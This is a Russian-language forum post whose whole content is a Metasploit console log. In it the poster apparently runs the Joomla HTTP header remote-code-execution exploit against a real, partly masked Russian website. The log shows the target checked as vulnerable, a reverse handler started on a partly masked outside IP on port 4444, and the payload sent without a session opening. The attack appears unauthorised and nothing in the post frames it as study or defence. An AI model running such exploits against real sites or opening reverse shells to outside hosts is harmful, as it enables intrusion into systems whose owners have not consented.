
17.12.2015, 06:38
|
|
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
Провел на форуме: 42754
Репутация:
0
|
|
Код:
msf exploit(joomla_http_header_rce) > set RHOST www.aquak***.ru
RHOST => www.aquak***.ru
msf exploit(joomla_http_header_rce) > check[*] www.aquak***.ru:80 - The target appears to be vulnerable.
msf exploit(joomla_http_header_rce) > exploit
[*] Started reverse handler on 188.227.**.**:4444[*] www.aquak***.ru:80 - Sending payload ...[*] Exploit completed, but no session was created.
msf exploit(joomla_http_header_rce) >
|
|
|